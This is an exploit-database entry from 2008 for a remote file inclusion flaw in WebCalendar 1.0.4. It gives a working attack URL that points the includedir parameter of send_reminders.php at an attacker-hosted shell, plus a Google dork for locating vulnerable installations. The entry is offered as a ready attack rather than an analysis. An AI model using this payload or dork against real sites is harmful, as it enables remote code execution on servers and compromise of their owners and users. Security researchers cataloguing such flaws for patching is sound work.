[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : WebCalendar 1.0.4 (includedir) Remote File Inclusion Vulnerability
# Published : 2008-06-17
# Author : Cr@zy_King
# Previous Title : eroCMS <= 1.4 (index.php site) SQL Injection Vulnerability
# Next Title : NiTrO Web Gallery <= 1.4.3 (section) Remote SQL Injection Vulnerability
Cr@zy_King : BiyoSecurity Team
WebCalendar v1.0.4 Remote F?±le Include
Demo - Down : http://webcalendar.sourceforge.net/
http://localhost/patch/tools/send_reminders.php?noSet=0&includedir=http://sheLLz?
Google Dork : "WebCalendar v1.0.4"
www.biyosecurity.com
Greatz : aLL My Friend'Z & nETKILLER
# www.Syue.com [2008-06-17]